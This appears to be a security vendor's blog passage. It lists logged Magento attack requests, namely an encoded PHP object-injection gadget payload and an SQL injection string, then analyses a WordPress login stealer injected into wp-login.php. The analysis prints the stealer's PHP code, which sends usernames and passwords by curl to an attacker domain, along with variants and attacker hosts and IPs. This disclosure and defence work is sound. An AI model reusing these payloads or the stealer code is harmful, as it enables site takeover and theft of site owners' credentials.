154.9.169.173 -- GET -- http://site.com/madecache/varnish/esi/?misc=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- - -- 2020-04-15

Magento Magecart - Object Injection

23.229.39.178 -- POST -- /freegift/cart/gurlgift -- data=YTozOntzOjc6InByb2R1Y3QiO3M6MToiMSI7czo2OiJvcHRpb24iO3M6MToiMSI7czoxOiJ4IjtPOjg6IlplbmRfTG9nIjoxOntzOjExOiIAKgBfd3JpdGVycyI7YToxOntpOjA7TzoyMDoiWmVuZF9Mb2dfV3JpdGVyX01haWwiOjU6e3M6MTY6IgAqAF9ldmVudHNUb01haWwiO2E6MTp7aTowO2k6MTt9czoyMjoiACoAX2xheW91dEV2ZW50c1RvTWFpbCI7YTowOnt9czo4OiIAKgBfbWFpbCI7Tzo5OiJaZW5kX01haWwiOjA6e31zOjEwOiIAKgBfbGF5b3V0IjtPOjExOiJaZW5kX0xheW91dCI6Mzp7czoxMzoiACoAX2luZmxlY3RvciI7TzoyMzoiWmVuZF9GaWx0ZXJfUHJlZ1JlcGxhY2UiOjI6e3M6MTY6IgAqAF9tYXRjaFBhdHRlcm4iO3M6NzoiLyguKikvZSI7czoxNToiACoAX3JlcGxhY2VtZW50IjtzOjE2OiJleGl0KCJNYVphWWFOYSIpIjt9czoyMDoiACoAX2luZmxlY3RvckVuYWJsZWQiO2I6MTtzOjEwOiIAKgBfbGF5b3V0IjtzOjY6ImxheW91dCI7fXM6MjI6IgAqAF9zdWJqZWN0UHJlcGVuZFRleHQiO047fX19fQ== -- 2020-04-14

Magento Core - SQL Injection

45.11.24.151 -- GET -- /catalog/product_frontend_action/synchronize?ids%5B0%5D%5Badded_at%5D=&type_id=recently_products&ids%5B0%5D%5Bproduct_id%5D%5Bto%5D=%29%29%29+OR+%28SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+123%3D123%29+--+-&ids%5B0%5D%5Bproduct_id%5D%5Bfrom%5D=%3F -- - -- 2020-04-26

Public exploits already exist for all of the components listed above. We strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

WordPress Admin Login Stealer

During an investigation, we identified a WordPress login stealer using the PHP functions curl and file_get_contents. The malicious code was injected into the core file wp-login.php to intercept the information of a valid user and send it to the attacker.

The script gathers the site URL, IP, username and password details, then sends them to the remote site via curl.

$url="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$ip=$_SERVER['REMOTE_ADDR'];
$ccc_url=base64_decode("aHR0cDovLzEuc2FsZWZvcnlvdS5vcmcvdG9uZy9wYS9uZXdwdy9wYXNzLnBocD9hZG1pbmlwPQ").base64_encode($ip)."&host=".base64_encode($url)."&name=".base64_encode($_POST['log'])."&password=".base64_encode($_POST['pwd']);
$ccc=@file_get_contents($ccc_url);
if(empty($ccc)){function get_pass_Html($url){$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 2);
curl_exec($ch);
curl_close($ch);
return true;
}
get_pass_Html($ccc_url);
}
setcookie("whatsup","whatsupman",time()+3600*24*365);

Further analysis reveals that the base64 encoded string in this malicious script is actually the attacker’s URL:

hxxp://[1].saleforyou[.]org/tong/pa/newpw/pass.php?adminip=

Here is the information sent via curl:

hxxp://1[.]saleforyou[.]org/tong/pa/newpw/pass.php?adminip=$ip&host=$url&name=$_POST['log']&password=$_POST['pwd']

Malware Variants & Sub-Domains

This login stealing malware appears to have been distributed and used on other websites for about a year now. The same top-level domain has also been seen in other malware variations, but uses a different subdomain: 5[.]saleforyou[.]org

GET_Html('http://5[.]saleforyou[.]org/ming/exam/main.php?key='.$_GET['exam']."&host=".$_SERVER['HTTP_HOST']."&www=".$www);

Another variation also appears to be collecting server IP and HTTP_HOST using a different URL on the same domain:

curl_init();$timeout = 5;curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$content = curl_exec($ch);curl_close($ch);}return $content;}$jturl = "http://1[.]saleforyou[.]org/tong/get/htc/1.php?adminip=".$server_ip."&host=".$_SERVER['HTTP_HOST'];
  • saleforyou[.]org. 300 IN A 23.88.229.79 \ Enzu Inc.
  • 1.saleforyou[.]org. 300 IN A 172.246.126.170 \ Enzu Inc.
  • 2.saleforyou[.]org. 300 IN A 192.157.233.59 \ Enzu Inc.
  • 3.saleforyou[.]org. 300 IN A 192.157.233.176 \ Enzu Inc.
  • 4.saleforyou[.]org. 300 IN A 23.89.201.143 \ Enzu Inc.
  • 5.saleforyou[.]org. 300 IN A 144.208.127.115 \ Shock Hosting LLC
  • 6.saleforyou[.]org. 300 IN A 208.123.119.189 \ Shock Hosting LLC

It looks like Enzu Inc. has a long history of facilitating malware, spam, and general abuse; their IPs are listed in Stop Badware’s top 50 lists:

Each subdomain is being used for a different campaign, with some hosted on different servers — and even different datacenters.

Related Domains

Another domain, bingstyle[.]com, appears to be related. Attackers are using a similar URL structure for malicious files: tong/pa/pass.php

  • bingstyle[.]com. 300 IN A 104.31.70.141
  • bingstyle[.]com. 300 IN A 104.31.71.141

These Virustotal results suggest a relationship to saleforyou[.]org, or at least the same group: https://www.virustotal.com/gui/domain/bingstyle.com/relations

Unfortunately, bingstyle[.]com is using CloudFlare and we are unable to tell exactly where it's hosted.

Mitigation Steps

Login credential stealers like this one can easily be used as a backdoor to maintain unauthorized access to a website long after the initial infection. The malicious script will simply continue to send the stolen login credentials to the attacker until it is removed from the compromised environment.

To catch these types of infections, set up and maintain a file monitoring system to alert you to any changes in your core WordPress files and detect malicious activity along with other indicators of compromise.